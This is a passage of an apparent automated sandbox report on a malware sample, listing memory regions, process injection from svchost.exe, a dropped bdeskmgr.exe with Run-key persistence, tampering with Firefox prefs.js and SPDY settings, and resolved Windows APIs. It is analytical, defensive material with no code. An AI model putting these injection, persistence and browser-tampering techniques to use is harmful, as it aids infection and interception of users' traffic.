| private_0x00000000032d0000 | 0x032d0000 | 0x032d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x032e3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x032f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003300000 | 0x03300000 | 0x03300fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003310000 | 0x03310000 | 0x03310fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003320000 | 0x03320000 | 0x03320fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003330000 | 0x03330000 | 0x03330fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003340000 | 0x03340000 | 0x033bffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x033c0000 | 0x03ceffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003cf0000 | 0x03cf0000 | 0x03cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003d00000 | 0x03d00000 | 0x03d00fff | Private Memory | Readable, Writable |
|
|
|
- |
| {0448dc77-1f74-49f5-ba7e-8de74fa55642}.2.ver0x0000000000000001.db | 0x03d20000 | 0x03d20fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x03d30000 | 0x03d33fff | Memory Mapped File | Readable |
|
|
|
- |
| {9d8c497c-611a-4408-acad-eadee99a69bf}.2.ver0x0000000000000001.db | 0x03d40000 | 0x03d40fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003d50000 | 0x03d50000 | 0x03dcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03dd0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003de0000 | 0x03de0000 | 0x03de0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003df0000 | 0x03df0000 | 0x03df0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003e00000 | 0x03e00000 | 0x03e00fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003e10000 | 0x03e10000 | 0x03e11fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003e40000 | 0x03e40000 | 0x03ebffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ec0000 | 0x03ec0000 | 0x03f0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003f10000 | 0x03f10000 | 0x03f10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003f20000 | 0x03f20000 | 0x03f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x0411ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x0419ffff | Private Memory | Readable, Writable |
|
|
|
- |
| wdmaud.drv.mui | 0x041a0000 | 0x041a0fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| mmdevapi.dll.mui | 0x041b0000 | 0x041b0fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x041c1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000042d0000 | 0x042d0000 | 0x042d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000043a0000 | 0x043a0000 | 0x043a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000043c0000 | 0x043c0000 | 0x043c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x0444ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004450000 | 0x04450000 | 0x04451fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004460000 | 0x04460000 | 0x04461fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004470000 | 0x04470000 | 0x04470fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004480000 | 0x04480000 | 0x04480fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x04490fff | Private Memory | Readable, Writable |
|
|
|
- |
| oleaccrc.dll | 0x044a0000 | 0x044a0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000044b0000 | 0x044b0000 | 0x044b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x0453ffff | Private Memory | Readable, Writable |
|
|
|
- |
| bthprops.cpl.mui | 0x04540000 | 0x04546fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x045cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000045d0000 | 0x045d0000 | 0x047cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000047d0000 | 0x047d0000 | 0x04bd2fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04e2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04eaffff | Private Memory | Readable, Writable |
|
|
|
- |
| imageres.dll | 0x050c0000 | 0x06414fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000006450000 | 0x06450000 | 0x064cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000064f0000 | 0x064f0000 | 0x0656ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006580000 | 0x06580000 | 0x065fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006610000 | 0x06610000 | 0x0668ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000066d0000 | 0x066d0000 | 0x0674ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006750000 | 0x06750000 | 0x067cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006840000 | 0x06840000 | 0x068bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000069e0000 | 0x069e0000 | 0x069effff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 265 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create Remote Thread | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x76f36930 |
|
1 | |
| Modify Memory | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x76f36930, size = 4 |
|
2 | |
| Modify Memory | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x3fa0000, size = 561152 |
|
1 | |
| Modify Memory | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x2950000, size = 792 |
|
1 | |
| Modify Control Flow | #5: c:\windows\system32\svchost.exe | 0x960 | os_tid = 0x8cc, address = 0x0 |
|
1 |
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js | 5.36 KB |
MD5:
98355e412e0ae6a50ea364a9291775ee
SHA1: 511e143755354e79abb3ab4e9870602c8e95f347 SHA256: 8d3037bc713a7c2b9b3c576ebf2404a337b7b6d98b2ef42646d3b0cbb5aa4dc0 |
|
|
Host Behavior
File (14)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\c_1252.nls | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
3 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6 | - |
|
1 | |
| Create Pipe | \device\namedpipe\{ce377949-d5dc-3008-cfe2-d96473361dd8} | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_TYPE_MESSAGE, max_instances = 255 |
|
1 | |
| Get Info | C:\Windows\system32\c_1252.nls | type = time |
|
1 | |
| Get Info | C:\Windows\system32\c_1252.nls | type = time |
|
1 | |
| Get Info | C:\Windows\system32\c_1252.nls | type = time |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js | type = size |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js | size = 5440, size_out = 5440 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js | size = 48 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Ini, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Keys, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Client, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = api--1-0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = api--1-0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = {70017650-0FA6-225C-19A4-B3765D18970A}, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = api--1-0, data = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, size = 132, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = {70017650-0FA6-225C-19A4-B3765D18970A}, size = 8, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = EnableSPDY3_0, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (183)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\explorer.exe | type = PROCESS_BASIC_INFORMATION |
|
178 | |
| Open | c:\program files\microsoft office\root\office16\winword.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office\root\office16\winword.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\root\office16\winword.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
2 |
Module (221)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x0 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x7feff120000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x7fefe590000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76df0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x770b0000 |
|
1 | |
| Load | ADVAPI32.DLL | base_address = 0x7feff120000 |
|
1 | |
| Get Handle | KERNEL32.DLL | base_address = 0x76cd0000 |
|
5 | |
| Get Handle | NTDLL.DLL | base_address = 0x76ef0000 |
|
2 | |
| Get Handle | kernelbase | base_address = 0x7fefcef0000 |
|
1 | |
| Get Handle | ADVAPI32.DLL | base_address = 0x7feff120000 |
|
2 | |
| Get Handle | Unknown module name | base_address = 0xff140000 |
|
3 | |
| Get Filename | KERNEL32.dll | process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 |
|
1 | |
| Get Filename | KERNEL32.dll | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| Get Filename | KERNEL32.dll | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| Get Address | - | function = sprintf, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = NtMapViewOfSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = NtUnmapViewOfSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = NtCreateSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ZwOpenProcessToken, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ZwClose, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ZwQueryInformationToken, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ZwOpenProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = strcpy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = NtQuerySystemInformation, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RtlNtStatusToDosError, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ZwQueryInformationProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = _snprintf, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = _wcsupr, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = _strupr, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = memmove, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = wcscpy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = memset, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RtlFreeUnicodeString, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ZwQueryKey, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = wcstombs, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RtlAdjustPrivilege, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = mbstowcs, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RtlImageNtHeader, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = memcpy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = __C_specific_handler, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetFileAttributesW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = VirtualProtectEx, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = QueueUserWorkItem, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FindFirstFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FindNextFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CompareFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ExpandEnvironmentStringsA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetCurrentProcessId, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetVersion, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetLocalTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetModuleFileNameA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateDirectoryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetLastError, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = HeapFree, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RemoveDirectoryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CloseHandle, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = DeleteFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcpyA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrlenA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcatA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = WriteFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = HeapAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = HeapDestroy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = HeapCreate, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SetEvent, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = HeapReAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SuspendThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcmpiW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ResumeThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetModuleHandleA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcpyW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcatW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SwitchToThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = Sleep, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetTickCount, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CopyFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SetWaitableTimer, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetCurrentThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetCurrentThreadId, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = DuplicateHandle, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrlenW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateEventA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetWindowsDirectoryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = DeleteFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateDirectoryW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetTempPathA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = WaitForSingleObject, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = OpenProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = WaitForMultipleObjects, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcmpA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ResetEvent, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateMutexA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = MapViewOfFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = OpenWaitableTimerA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = OpenMutexA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ReleaseMutex, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetVersionExA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateWaitableTimerA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SetLastError, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcmpiA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = InitializeCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = EnterCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = LeaveCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = UnregisterWait, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RegisterWaitForSingleObject, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = TlsAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = TlsGetValue, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = LoadLibraryExW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = TlsSetValue, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetFileAttributesA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = OpenFileMappingA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetExitCodeProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetComputerNameW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetFileSize, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateProcessA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateFileMappingA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetDriveTypeW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = WideCharToMultiByte, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = lstrcpynA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GlobalUnlock, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = LocalFree, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GlobalLock, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = Thread32First, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = QueueUserAPC, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = OpenThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = Thread32Next, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ReadFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ConnectNamedPipe, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetOverlappedResult, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CancelIo, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = DisconnectNamedPipe, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FlushFileBuffers, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CallNamedPipeA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = CreateNamedPipeA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetSystemTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = WaitNamedPipeA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SleepEx, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = OpenEventA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ExitThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = LocalAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FreeLibrary, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RaiseException, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = VirtualFree, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetModuleFileNameW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FileTimeToSystemTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
